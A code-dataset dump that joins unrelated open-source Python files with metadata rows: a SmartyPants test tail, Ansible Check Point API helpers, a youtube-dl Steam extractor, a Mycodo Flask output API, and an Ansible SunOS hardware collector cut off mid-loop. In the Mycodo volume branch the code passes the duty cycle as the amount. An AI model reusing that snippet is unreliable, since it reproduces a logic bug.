self.assertEqual(sp("1440---'80s"), "1440–‘80s")
self.assertEqual(sp("1960s"), "1960s") # no effect.
self.assertEqual(sp("1960's"), "1960’s")
self.assertEqual(sp("one two '60s"), "one two ‘60s")
self.assertEqual(sp("'60s"), "‘60s")
def test_skip_tags(self):
self.assertEqual(
sp("""<script type="text/javascript">\n<!--\nvar href = "http://www.google.com";\nvar linktext = "google";\ndocument.write('<a href="' + href + '">' + linktext + "</a>");\n//-->\n</script>"""),
"""<script type="text/javascript">\n<!--\nvar href = "http://www.google.com";\nvar linktext = "google";\ndocument.write('<a href="' + href + '">' + linktext + "</a>");\n//-->\n</script>""")
self.assertEqual(
sp("""<p>He said "Let's write some code." This code here <code>if True:\n\tprint "Okay"</code> is python code.</p>"""),
"""<p>He said “Let’s write some code.” This code here <code>if True:\n\tprint "Okay"</code> is python code.</p>""")
def test_ordinal_numbers(self):
self.assertEqual(sp("21st century"), "21st century") # no effect.
self.assertEqual(sp("3rd"), "3rd") # no effect.
def test_educated_quotes(self):
self.assertEqual(sp('''"Isn't this fun?"'''), '''“Isn’t this fun?”''')
unittest.main()
__author__ = "Chad Miller <[email protected]>"
__version__ = "1.5_1.6: Fri, 27 Jul 2007 07:06:40 -0400"
__url__ = "http://wiki.chad.org/SmartyPantsPy"
__description__ = "Smart-quotes, smart-ellipses, and smart-dashes for weblog entries in pyblosxom"
| mit | -1,972,851,282,068,823,300 | 31.292359 | 198 | 0.650686 | false |
resmo/ansible | lib/ansible/module_utils/network/checkpoint/checkpoint.py | 8 | 19463 | # This code is part of Ansible, but is an independent component.
# This particular file snippet, and this file snippet only, is BSD licensed.
# Modules you write using this snippet, which is embedded dynamically by Ansible
# still belong to the author of the module, and may assign their own license
# to the complete work.
#
# (c) 2018 Red Hat Inc.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from __future__ import (absolute_import, division, print_function)
import time
from ansible.module_utils.connection import Connection
checkpoint_argument_spec_for_objects = dict(
auto_publish_session=dict(type='bool'),
wait_for_task=dict(type='bool', default=True),
state=dict(type='str', choices=['present', 'absent'], default='present'),
version=dict(type='str')
)
checkpoint_argument_spec_for_facts = dict(
version=dict(type='str')
)
checkpoint_argument_spec_for_commands = dict(
wait_for_task=dict(type='bool', default=True),
version=dict(type='str')
)
delete_params = ['name', 'uid', 'layer', 'exception-group-name', 'layer', 'rule-name']
# send the request to checkpoint
def send_request(connection, version, url, payload=None):
code, response = connection.send_request('/web_api/' + version + url, payload)
return code, response
# get the payload from the user parameters
def is_checkpoint_param(parameter):
if parameter == 'auto_publish_session' or \
parameter == 'state' or \
parameter == 'wait_for_task' or \
parameter == 'version':
return False
return True
# build the payload from the parameters which has value (not None), and they are parameter of checkpoint API as well
def get_payload_from_parameters(params):
payload = {}
for parameter in params:
parameter_value = params[parameter]
if parameter_value and is_checkpoint_param(parameter):
if isinstance(parameter_value, dict):
payload[parameter.replace("_", "-")] = get_payload_from_parameters(parameter_value)
elif isinstance(parameter_value, list) and len(parameter_value) != 0 and isinstance(parameter_value[0], dict):
payload_list = []
for element_dict in parameter_value:
payload_list.append(get_payload_from_parameters(element_dict))
payload[parameter.replace("_", "-")] = payload_list
else:
payload[parameter.replace("_", "-")] = parameter_value
return payload
# wait for task
def wait_for_task(module, version, connection, task_id):
task_id_payload = {'task-id': task_id}
task_complete = False
current_iteration = 0
max_num_iterations = 300
# As long as there is a task in progress
while not task_complete and current_iteration < max_num_iterations:
current_iteration += 1
# Check the status of the task
code, response = send_request(connection, version, 'show-task', task_id_payload)
attempts_counter = 0
while code != 200:
if attempts_counter < 5:
attempts_counter += 1
time.sleep(2)
code, response = send_request(connection, version, 'show-task', task_id_payload)
else:
response['message'] = "ERROR: Failed to handle asynchronous tasks as synchronous, tasks result is" \
" undefined.\n" + response['message']
module.fail_json(msg=response)
# Count the number of tasks that are not in-progress
completed_tasks = 0
for task in response['tasks']:
if task['status'] == 'failed':
module.fail_json(msg='Task {0} with task id {1} failed. Look at the logs for more details'
.format(task['task-name'], task['task-id']))
if task['status'] == 'in progress':
break
completed_tasks += 1
# Are we done? check if all tasks are completed
if completed_tasks == len(response["tasks"]):
task_complete = True
else:
time.sleep(2) # Wait for two seconds
if not task_complete:
module.fail_json(msg="ERROR: Timeout.\nTask-id: {0}.".format(task_id_payload['task-id']))
# handle publish command, and wait for it to end if the user asked so
def handle_publish(module, connection, version):
if module.params['auto_publish_session']:
publish_code, publish_response = send_request(connection, version, 'publish')
if publish_code != 200:
module.fail_json(msg=publish_response)
if module.params['wait_for_task']:
wait_for_task(module, version, connection, publish_response['task-id'])
# handle a command
def api_command(module, command):
payload = get_payload_from_parameters(module.params)
connection = Connection(module._socket_path)
# if user insert a specific version, we add it to the url
version = ('v' + module.params['version'] + '/') if module.params.get('version') else ''
code, response = send_request(connection, version, command, payload)
result = {'changed': True}
if code == 200:
if module.params['wait_for_task']:
if 'task-id' in response:
wait_for_task(module, version, connection, response['task-id'])
elif 'tasks' in response:
for task_id in response['tasks']:
wait_for_task(module, version, connection, task_id)
result[command] = response
else:
module.fail_json(msg='Checkpoint device returned error {0} with message {1}'.format(code, response))
return result
# handle api call facts
def api_call_facts(module, api_call_object, api_call_object_plural_version):
payload = get_payload_from_parameters(module.params)
connection = Connection(module._socket_path)
# if user insert a specific version, we add it to the url
version = ('v' + module.params['version'] + '/') if module.params['version'] else ''
# if there is neither name nor uid, the API command will be in plural version (e.g. show-hosts instead of show-host)
if payload.get("name") is None and payload.get("uid") is None:
api_call_object = api_call_object_plural_version
code, response = send_request(connection, version, 'show-' + api_call_object, payload)
if code != 200:
module.fail_json(msg='Checkpoint device returned error {0} with message {1}'.format(code, response))
result = {api_call_object: response}
return result
# handle api call
def api_call(module, api_call_object):
payload = get_payload_from_parameters(module.params)
connection = Connection(module._socket_path)
result = {'changed': False}
if module.check_mode:
return result
# if user insert a specific version, we add it to the url
version = ('v' + module.params['version'] + '/') if module.params.get('version') else ''
payload_for_equals = {'type': api_call_object, 'params': payload}
equals_code, equals_response = send_request(connection, version, 'equals', payload_for_equals)
result['checkpoint_session_uid'] = connection.get_session_uid()
# if code is 400 (bad request) or 500 (internal error) - fail
if equals_code == 400 or equals_code == 500:
module.fail_json(msg=equals_response)
if equals_code == 404 and equals_response['code'] == 'generic_err_command_not_found':
module.fail_json(msg='Relevant hotfix is not installed on Check Point server. See sk114661 on Check Point Support Center.')
if module.params['state'] == 'present':
if equals_code == 200:
if not equals_response['equals']:
code, response = send_request(connection, version, 'set-' + api_call_object, payload)
if code != 200:
module.fail_json(msg=response)
handle_publish(module, connection, version)
result['changed'] = True
result[api_call_object] = response
else:
# objects are equals and there is no need for set request
pass
elif equals_code == 404:
code, response = send_request(connection, version, 'add-' + api_call_object, payload)
if code != 200:
module.fail_json(msg=response)
handle_publish(module, connection, version)
result['changed'] = True
result[api_call_object] = response
elif module.params['state'] == 'absent':
if equals_code == 200:
payload_for_delete = get_copy_payload_with_some_params(payload, delete_params)
code, response = send_request(connection, version, 'delete-' + api_call_object, payload_for_delete)
if code != 200:
module.fail_json(msg=response)
handle_publish(module, connection, version)
result['changed'] = True
elif equals_code == 404:
# no need to delete because object dose not exist
pass
return result
# get the position in integer format
def get_number_from_position(payload, connection, version):
if 'position' in payload:
position = payload['position']
else:
return None
# This code relevant if we will decide to support 'top' and 'bottom' in position
# position_number = None
# # if position is not int, convert it to int. There are several cases: "top"
# if position == 'top':
# position_number = 1
# elif position == 'bottom':
# payload_for_show_access_rulebase = {'name': payload['layer'], 'limit': 0}
# code, response = send_request(connection, version, 'show-access-rulebase', payload_for_show_access_rulebase)
# position_number = response['total']
# elif isinstance(position, str):
# # here position is a number in format str (e.g. "5" and not 5)
# position_number = int(position)
# else:
# # here position suppose to be int
# position_number = position
#
# return position_number
return int(position)
# is the param position (if the user inserted it) equals between the object and the user input
def is_equals_with_position_param(payload, connection, version, api_call_object):
position_number = get_number_from_position(payload, connection, version)
# if there is no position param, then it's equals in vacuous truth
if position_number is None:
return True
payload_for_show_access_rulebase = {'name': payload['layer'], 'offset': position_number - 1, 'limit': 1}
rulebase_command = 'show-' + api_call_object.split('-')[0] + '-rulebase'
# if it's threat-exception, we change a little the payload and the command
if api_call_object == 'threat-exception':
payload_for_show_access_rulebase['rule-name'] = payload['rule-name']
rulebase_command = 'show-threat-rule-exception-rulebase'
code, response = send_request(connection, version, rulebase_command, payload_for_show_access_rulebase)
# if true, it means there is no rule in the position that the user inserted, so I return false, and when we will try to set
# the rule, the API server will get throw relevant error
if response['total'] < position_number:
return False
rule = response['rulebase'][0]
while 'rulebase' in rule:
rule = rule['rulebase'][0]
# if the names of the exist rule and the user input rule are equals, then it's means that their positions are equals so I
# return True. and there is no way that there is another rule with this name cause otherwise the 'equals' command would fail
if rule['name'] == payload['name']:
return True
else:
return False
# get copy of the payload without some of the params
def get_copy_payload_without_some_params(payload, params_to_remove):
copy_payload = dict(payload)
for param in params_to_remove:
if param in copy_payload:
del copy_payload[param]
return copy_payload
# get copy of the payload with only some of the params
def get_copy_payload_with_some_params(payload, params_to_insert):
copy_payload = {}
for param in params_to_insert:
if param in payload:
copy_payload[param] = payload[param]
return copy_payload
# is equals with all the params including action and position
def is_equals_with_all_params(payload, connection, version, api_call_object, is_access_rule):
if is_access_rule and 'action' in payload:
payload_for_show = get_copy_payload_with_some_params(payload, ['name', 'uid', 'layer'])
code, response = send_request(connection, version, 'show-' + api_call_object, payload_for_show)
exist_action = response['action']['name']
if exist_action != payload['action']:
return False
if not is_equals_with_position_param(payload, connection, version, api_call_object):
return False
return True
# handle api call for rule
def api_call_for_rule(module, api_call_object):
is_access_rule = True if 'access' in api_call_object else False
payload = get_payload_from_parameters(module.params)
connection = Connection(module._socket_path)
result = {'changed': False}
if module.check_mode:
return result
# if user insert a specific version, we add it to the url
version = ('v' + module.params['version'] + '/') if module.params.get('version') else ''
if is_access_rule:
copy_payload_without_some_params = get_copy_payload_without_some_params(payload, ['action', 'position'])
else:
copy_payload_without_some_params = get_copy_payload_without_some_params(payload, ['position'])
payload_for_equals = {'type': api_call_object, 'params': copy_payload_without_some_params}
equals_code, equals_response = send_request(connection, version, 'equals', payload_for_equals)
result['checkpoint_session_uid'] = connection.get_session_uid()
# if code is 400 (bad request) or 500 (internal error) - fail
if equals_code == 400 or equals_code == 500:
module.fail_json(msg=equals_response)
if equals_code == 404 and equals_response['code'] == 'generic_err_command_not_found':
module.fail_json(msg='Relevant hotfix is not installed on Check Point server. See sk114661 on Check Point Support Center.')
if module.params['state'] == 'present':
if equals_code == 200:
if equals_response['equals']:
if not is_equals_with_all_params(payload, connection, version, api_call_object, is_access_rule):
equals_response['equals'] = False
if not equals_response['equals']:
# if user insert param 'position' and needed to use the 'set' command, change the param name to 'new-position'
if 'position' in payload:
payload['new-position'] = payload['position']
del payload['position']
code, response = send_request(connection, version, 'set-' + api_call_object, payload)
if code != 200:
module.fail_json(msg=response)
handle_publish(module, connection, version)
result['changed'] = True
result[api_call_object] = response
else:
# objects are equals and there is no need for set request
pass
elif equals_code == 404:
code, response = send_request(connection, version, 'add-' + api_call_object, payload)
if code != 200:
module.fail_json(msg=response)
handle_publish(module, connection, version)
result['changed'] = True
result[api_call_object] = response
elif module.params['state'] == 'absent':
if equals_code == 200:
payload_for_delete = get_copy_payload_with_some_params(payload, delete_params)
code, response = send_request(connection, version, 'delete-' + api_call_object, payload_for_delete)
if code != 200:
module.fail_json(msg=response)
handle_publish(module, connection, version)
result['changed'] = True
elif equals_code == 404:
# no need to delete because object dose not exist
pass
return result
# handle api call facts for rule
def api_call_facts_for_rule(module, api_call_object, api_call_object_plural_version):
payload = get_payload_from_parameters(module.params)
connection = Connection(module._socket_path)
# if user insert a specific version, we add it to the url
version = ('v' + module.params['version'] + '/') if module.params['version'] else ''
# if there is neither name nor uid, the API command will be in plural version (e.g. show-hosts instead of show-host)
if payload.get("layer") is None:
api_call_object = api_call_object_plural_version
code, response = send_request(connection, version, 'show-' + api_call_object, payload)
if code != 200:
module.fail_json(msg='Checkpoint device returned error {0} with message {1}'.format(code, response))
result = {api_call_object: response}
return result
# The code from here till EOF will be deprecated when Rikis' modules will be deprecated
checkpoint_argument_spec = dict(auto_publish_session=dict(type='bool', default=True),
policy_package=dict(type='str', default='standard'),
auto_install_policy=dict(type='bool', default=True),
targets=dict(type='list')
)
def publish(connection, uid=None):
payload = None
if uid:
payload = {'uid': uid}
connection.send_request('/web_api/publish', payload)
def discard(connection, uid=None):
payload = None
if uid:
payload = {'uid': uid}
connection.send_request('/web_api/discard', payload)
def install_policy(connection, policy_package, targets):
payload = {'policy-package': policy_package,
'targets': targets}
connection.send_request('/web_api/install-policy', payload)
| gpl-3.0 | -1,970,166,692,051,579,100 | 40.498934 | 131 | 0.644762 | false |
jbuchbinder/youtube-dl | youtube_dl/extractor/steam.py | 61 | 4662 | from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
ExtractorError,
unescapeHTML,
)
class SteamIE(InfoExtractor):
_VALID_URL = r"""(?x)
https?://store\.steampowered\.com/
(agecheck/)?
(?P<urltype>video|app)/ #If the page is only for videos or for a game
(?P<gameID>\d+)/?
(?P<videoID>\d*)(?P<extra>\??) # For urltype == video we sometimes get the videoID
|
https?://(?:www\.)?steamcommunity\.com/sharedfiles/filedetails/\?id=(?P<fileID>[0-9]+)
"""
_VIDEO_PAGE_TEMPLATE = 'http://store.steampowered.com/video/%s/'
_AGECHECK_TEMPLATE = 'http://store.steampowered.com/agecheck/video/%s/?snr=1_agecheck_agecheck__age-gate&ageDay=1&ageMonth=January&ageYear=1970'
_TESTS = [{
'url': 'http://store.steampowered.com/video/105600/',
'playlist': [
{
'md5': 'f870007cee7065d7c76b88f0a45ecc07',
'info_dict': {
'id': '81300',
'ext': 'flv',
'title': 'Terraria 1.1 Trailer',
'playlist_index': 1,
}
},
{
'md5': '61aaf31a5c5c3041afb58fb83cbb5751',
'info_dict': {
'id': '80859',
'ext': 'flv',
'title': 'Terraria Trailer',
'playlist_index': 2,
}
}
],
'params': {
'playlistend': 2,
}
}, {
'url': 'http://steamcommunity.com/sharedfiles/filedetails/?id=242472205',
'info_dict': {
'id': 'WB5DvDOOvAY',
'ext': 'mp4',
'upload_date': '20140329',
'title': 'FRONTIERS - Final Greenlight Trailer',
'description': 'md5:dc96a773669d0ca1b36c13c1f30250d9',
'uploader': 'AAD Productions',
'uploader_id': 'AtomicAgeDogGames',
}
}]
def _real_extract(self, url):
m = re.match(self._VALID_URL, url)
fileID = m.group('fileID')
if fileID:
videourl = url
playlist_id = fileID
else:
gameID = m.group('gameID')
playlist_id = gameID
videourl = self._VIDEO_PAGE_TEMPLATE % playlist_id
webpage = self._download_webpage(videourl, playlist_id)
if re.search('<h2>Please enter your birth date to continue:</h2>', webpage) is not None:
videourl = self._AGECHECK_TEMPLATE % playlist_id
self.report_age_confirmation()
webpage = self._download_webpage(videourl, playlist_id)
if fileID:
playlist_title = self._html_search_regex(
r'<div class="workshopItemTitle">(.+)</div>', webpage, 'title')
mweb = re.finditer(r'''(?x)
'movie_(?P<videoID>[0-9]+)':\s*\{\s*
YOUTUBE_VIDEO_ID:\s*"(?P<youtube_id>[^"]+)",
''', webpage)
videos = [{
'_type': 'url',
'url': vid.group('youtube_id'),
'ie_key': 'Youtube',
} for vid in mweb]
else:
playlist_title = self._html_search_regex(
r'<h2 class="pageheader">(.*?)</h2>', webpage, 'game title')
mweb = re.finditer(r'''(?x)
'movie_(?P<videoID>[0-9]+)':\s*\{\s*
FILENAME:\s*"(?P<videoURL>[\w:/\.\?=]+)"
(,\s*MOVIE_NAME:\s*\"(?P<videoName>[\w:/\.\?=\+-]+)\")?\s*\},
''', webpage)
titles = re.finditer(
r'<span class="title">(?P<videoName>.+?)</span>', webpage)
thumbs = re.finditer(
r'<img class="movie_thumb" src="(?P<thumbnail>.+?)">', webpage)
videos = []
for vid, vtitle, thumb in zip(mweb, titles, thumbs):
video_id = vid.group('videoID')
title = vtitle.group('videoName')
video_url = vid.group('videoURL')
video_thumb = thumb.group('thumbnail')
if not video_url:
raise ExtractorError('Cannot find video url for %s' % video_id)
videos.append({
'id': video_id,
'url': video_url,
'ext': 'flv',
'title': unescapeHTML(title),
'thumbnail': video_thumb
})
if not videos:
raise ExtractorError('Could not find any videos')
return self.playlist_result(videos, playlist_id, playlist_title)
| unlicense | -7,882,243,147,157,133,000 | 36.902439 | 148 | 0.478979 | false |
kizniche/Mycodo | mycodo/mycodo_flask/api/output.py | 1 | 9541 | # coding=utf-8
import logging
import traceback
import flask_login
from flask_accept import accept
from flask_restx import Resource
from flask_restx import abort
from flask_restx import fields
from mycodo.databases.models import Output
from mycodo.databases.models import OutputChannel
from mycodo.databases.models.output import OutputChannelSchema
from mycodo.databases.models.output import OutputSchema
from mycodo.mycodo_client import DaemonControl
from mycodo.mycodo_flask.api import api
from mycodo.mycodo_flask.api import default_responses
from mycodo.mycodo_flask.api.sql_schema_fields import output_channel_fields
from mycodo.mycodo_flask.api.sql_schema_fields import output_fields
from mycodo.mycodo_flask.api.utils import get_from_db
from mycodo.mycodo_flask.api.utils import return_list_of_dictionaries
from mycodo.mycodo_flask.utils import utils_general
from mycodo.mycodo_flask.utils.utils_output import get_all_output_states
logger = logging.getLogger(__name__)
ns_output = api.namespace('outputs', description='Output operations')
MODEL_STATES_STATE = ns_output.model('states', {
'*': fields.Wildcard(fields.String(description='on, off, or a duty cycle'),)
})
MODEL_STATES_CHAN = ns_output.model('channels', {
'*': fields.Wildcard(fields.Nested(
MODEL_STATES_STATE,
description='Dictionary with channel as key and state data as value.'))
})
output_list_fields = ns_output.model('Output Fields List', {
'output devices': fields.List(fields.Nested(output_fields)),
'output channels': fields.List(fields.Nested(output_channel_fields)),
'output states': fields.Nested(
MODEL_STATES_CHAN,
description='Dictionary with ID as key and channel state data as value.')
})
output_unique_id_fields = ns_output.model('Output Device Fields List', {
'output device': fields.Nested(output_fields),
'output device channels': fields.List(fields.Nested(output_channel_fields)),
'output device channel states': fields.Nested(
MODEL_STATES_STATE,
description='Dictionary with channel as key and state data as value.')
})
output_set_fields = ns_output.model('Output Modulation Fields', {
'state': fields.Boolean(
description='Set a non-PWM output state to on (True) or off (False).',
required=False),
'channel': fields.Float(
description='The output channel to modulate.',
required=True,
example=0,
min=0),
'duration': fields.Float(
description='The duration to keep a non-PWM output on, in seconds.',
required=False,
example=10.0,
exclusiveMin=0),
'duty_cycle': fields.Float(
description='The duty cycle to set a PWM output, in percent (%).',
required=False,
example=50.0,
min=0),
'volume': fields.Float(
description='The volume to send to an output.',
required=False,
example=35.0,
min=0)
})
def return_handler(return_):
if return_ is None:
return {'message': 'Success'}, 200
elif return_[0] in [0, 'success']:
return {'message': 'Success: {}'.format(return_[1])}, 200
elif return_[0] in [1, 'error']:
return {'message': 'Fail: {}'.format(return_[1])}, 460
else:
return '', 500
@ns_output.route('/')
@ns_output.doc(security='apikey', responses=default_responses)
class Inputs(Resource):
"""Output information"""
@accept('application/vnd.mycodo.v1+json')
@ns_output.marshal_with(output_list_fields)
@flask_login.login_required
def get(self):
"""Show all output settings and statuses"""
if not utils_general.user_has_permission('view_settings'):
abort(403)
try:
list_data = get_from_db(OutputSchema, Output)
list_channels = get_from_db(OutputChannelSchema, OutputChannel)
states = get_all_output_states()
# Change integer channel keys to strings (flask-restx limitation?)
new_state_dict = {}
for each_id in states:
new_state_dict[each_id] = {}
for each_channel in states[each_id]:
new_state_dict[each_id][str(each_channel)] = states[each_id][each_channel]
if list_data:
return {'output devices': list_data,
'output channels': list_channels,
'output states': new_state_dict}, 200
except Exception:
abort(500,
message='An exception occurred',
error=traceback.format_exc())
@ns_output.route('/<string:unique_id>')
@ns_output.doc(
security='apikey',
responses=default_responses,
params={'unique_id': 'The unique ID of the output.'}
)
class Outputs(Resource):
"""Output status"""
@accept('application/vnd.mycodo.v1+json')
@ns_output.marshal_with(output_unique_id_fields)
@flask_login.login_required
def get(self, unique_id):
"""Show the settings and status for an output"""
if not utils_general.user_has_permission('edit_controllers'):
abort(403)
try:
list_data = get_from_db(OutputSchema, Output, unique_id=unique_id)
output_channel_schema = OutputChannelSchema()
list_channels = return_list_of_dictionaries(
output_channel_schema.dump(
OutputChannel.query.filter_by(
output_id=unique_id).all(), many=True))
states = get_all_output_states()
# Change integer channel keys to strings (flask-restx limitation?)
new_state_dict = {}
for each_channel in states[unique_id]:
new_state_dict[str(each_channel)] = states[unique_id][each_channel]
return {'output device': list_data,
'output device channels': list_channels,
'output device channel states': new_state_dict}, 200
except Exception:
abort(500,
message='An exception occurred',
error=traceback.format_exc())
@accept('application/vnd.mycodo.v1+json')
@ns_output.expect(output_set_fields)
@flask_login.login_required
def post(self, unique_id):
"""Change the state of an output"""
if not utils_general.user_has_permission('edit_controllers'):
abort(403)
control = DaemonControl()
state = None
channel = None
duration = None
duty_cycle = None
volume = None
if ns_output.payload:
if 'state' in ns_output.payload:
state = ns_output.payload["state"]
if state is not None:
try:
state = bool(state)
except Exception:
abort(422, message='state must represent a bool value')
if 'channel' in ns_output.payload:
channel = ns_output.payload["channel"]
if channel is not None:
try:
channel = int(channel)
except Exception:
abort(422, message='channel does not represent a number')
else:
channel = 0
if 'duration' in ns_output.payload:
duration = ns_output.payload["duration"]
if duration is not None:
try:
duration = float(duration)
except Exception:
abort(422, message='duration does not represent a number')
else:
duration = 0
if 'duty_cycle' in ns_output.payload:
duty_cycle = ns_output.payload["duty_cycle"]
if duty_cycle is not None:
try:
duty_cycle = float(duty_cycle)
if duty_cycle < 0 or duty_cycle > 100:
abort(422, message='Required: 0 <= duty_cycle <= 100')
except Exception:
abort(422, message='duty_cycle does not represent float value')
if 'volume' in ns_output.payload:
volume = ns_output.payload["volume"]
if volume is not None:
try:
volume = float(volume)
except Exception:
abort(422, message='volume does not represent float value')
try:
if state is not None and duration is not None:
return_ = control.output_on_off(
unique_id, state, output_channel=channel,
output_type='sec', amount=duration)
elif duty_cycle is not None:
return_ = control.output_on(
unique_id, output_channel=channel, output_type='pwm', amount=duty_cycle)
elif volume is not None:
return_ = control.output_on(
unique_id, output_channel=channel, output_type='vol', amount=duty_cycle)
elif state is not None:
return_ = control.output_on_off(
unique_id, state, output_channel=channel)
else:
return {'message': 'Insufficient payload'}, 460
return return_handler(return_)
except Exception:
abort(500,
message='An exception occurred',
error=traceback.format_exc())
| gpl-3.0 | 8,491,038,470,360,638,000 | 37.164 | 94 | 0.585159 | false |
DepthDeluxe/ansible | lib/ansible/module_utils/facts/hardware/sunos.py | 64 | 9586 | # This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import re
from ansible.module_utils.six.moves import reduce
from ansible.module_utils.basic import bytes_to_human
from ansible.module_utils.facts.utils import get_file_content, get_mount_size
from ansible.module_utils.facts.hardware.base import Hardware, HardwareCollector
from ansible.module_utils.facts import timeout
class SunOSHardware(Hardware):
"""
In addition to the generic memory and cpu facts, this also sets
swap_reserved_mb and swap_allocated_mb that is available from *swap -s*.
"""
platform = 'SunOS'
def populate(self, collected_facts=None):
hardware_facts = {}
# FIXME: could pass to run_command(environ_update), but it also tweaks the env
# of the parent process instead of altering an env provided to Popen()
# Use C locale for hardware collection helpers to avoid locale specific number formatting (#24542)
self.module.run_command_environ_update = {'LANG': 'C', 'LC_ALL': 'C', 'LC_NUMERIC': 'C'}
cpu_facts = self.get_cpu_facts()
memory_facts = self.get_memory_facts()
dmi_facts = self.get_dmi_facts()
device_facts = self.get_device_facts()
uptime_facts = self.get_uptime_facts()
mount_facts = {}
try:
mount_facts = self.get_mount_facts()
except timeout.TimeoutError:
pass
hardware_facts.update(cpu_facts)
hardware_facts.update(memory_facts)
hardware_facts.update(dmi_facts)
hardware_facts.update(device_facts)
hardware_facts.update(uptime_facts)
hardware_facts.update(mount_facts)
return hardware_facts
def get_cpu_facts(self, collected_facts=None):
physid = 0
sockets = {}
cpu_facts = {}
collected_facts = collected_facts or {}
rc, out, err = self.module.run_command("/usr/bin/kstat cpu_info")
cpu_facts['processor'] = []
for line in out.splitlines():
if len(line) < 1:
continue
data = line.split(None, 1)
key = data[0].strip()
# "brand" works on Solaris 10 & 11. "implementation" for Solaris 9.
if key == 'module:':
brand = ''
elif key == 'brand':
brand = data[1].strip()
elif key == 'clock_MHz':
clock_mhz = data[1].strip()
elif key == 'implementation':
processor = brand or data[1].strip()
# Add clock speed to description for SPARC CPU
# FIXME
if collected_facts.get('ansible_machine') != 'i86pc':
processor += " @ " + clock_mhz + "MHz"
if 'ansible_processor' not in collected_facts:
cpu_facts['processor'] = []
cpu_facts['processor'].append(processor)
elif key == 'chip_id':
physid = data[1].strip()
if physid not in sockets:
sockets[physid] = 1
else:
sockets[physid] += 1
# Counting cores on Solaris can be complicated.
# https://blogs.oracle.com/mandalika/entry/solaris_show_me_the_cpu
# Treat 'processor_count' as physical sockets and 'processor_cores' as
# virtual CPUs visisble to Solaris. Not a true count of cores for modern SPARC as
# these processors have: sockets -> cores -> threads/virtual CPU.
if len(sockets) > 0:
cpu_facts['processor_count'] = len(sockets)
cpu_facts['processor_cores'] = reduce(lambda x, y: x + y, sockets.values())
else:
cpu_facts['processor_cores'] = 'NA'
cpu_facts['processor_count'] = len(cpu_facts['processor'])
return cpu_facts
def get_memory_facts(self):
memory_facts = {}
rc, out, err = self.module.run_command(["/usr/sbin/prtconf"])
for line in out.splitlines():
if 'Memory size' in line:
memory_facts['memtotal_mb'] = int(line.split()[2])
rc, out, err = self.module.run_command("/usr/sbin/swap -s")
allocated = int(out.split()[1][:-1])
reserved = int(out.split()[5][:-1])
used = int(out.split()[8][:-1])
free = int(out.split()[10][:-1])
memory_facts['swapfree_mb'] = free // 1024
memory_facts['swaptotal_mb'] = (free + used) // 1024
memory_facts['swap_allocated_mb'] = allocated // 1024
memory_facts['swap_reserved_mb'] = reserved // 1024
return memory_facts
@timeout.timeout()
def get_mount_facts(self):
mount_facts = {}
mount_facts['mounts'] = []
# For a detailed format description see mnttab(4)
# special mount_point fstype options time
fstab = get_file_content('/etc/mnttab')
if fstab:
for line in fstab.splitlines():
fields = line.split('\t')
mount_statvfs_info = get_mount_size(fields[1])
mount_info = {'mount': fields[1],
'device': fields[0],
'fstype': fields[2],
'options': fields[3],
'time': fields[4]}
mount_info.update(mount_statvfs_info)
mount_facts['mounts'].append(mount_info)
return mount_facts
def get_dmi_facts(self):
dmi_facts = {}
uname_path = self.module.get_bin_path("prtdiag")
rc, out, err = self.module.run_command(uname_path)
"""
rc returns 1
"""
if out:
system_conf = out.split('\n')[0]
found = re.search(r'(\w+\sEnterprise\s\w+)', system_conf)
if found:
dmi_facts['product_name'] = found.group(1)
return dmi_facts
def get_device_facts(self):
# Device facts are derived for sdderr kstats. This code does not use the
# full output, but rather queries for specific stats.
# Example output:
# sderr:0:sd0,err:Hard Errors 0
# sderr:0:sd0,err:Illegal Request 6
# sderr:0:sd0,err:Media Error 0
# sderr:0:sd0,err:Predictive Failure Analysis 0
# sderr:0:sd0,err:Product VBOX HARDDISK 9
# sderr:0:sd0,err:Revision 1.0
# sderr:0:sd0,err:Serial No VB0ad2ec4d-074a
# sderr:0:sd0,err:Size 53687091200
# sderr:0:sd0,err:Soft Errors 0
# sderr:0:sd0,err:Transport Errors 0
# sderr:0:sd0,err:Vendor ATA
device_facts = {}
disk_stats = {
'Product': 'product',
'Revision': 'revision',
'Serial No': 'serial',
'Size': 'size',
'Vendor': 'vendor',
'Hard Errors': 'hard_errors',
'Soft Errors': 'soft_errors',
'Transport Errors': 'transport_errors',
'Media Error': 'media_errors',
'Predictive Failure Analysis': 'predictive_failure_analysis',
'Illegal Request': 'illegal_request',
}
cmd = ['/usr/bin/kstat', '-p']
for ds in disk_stats:
cmd.append('sderr:::%s' % ds)
d = {}
rc, out, err = self.module.run_command(cmd)
if rc != 0:
return device_facts
sd_instances = frozenset(line.split(':')[1] for line in out.split('\n') if line.startswith('sderr'))
for instance in sd_instances:
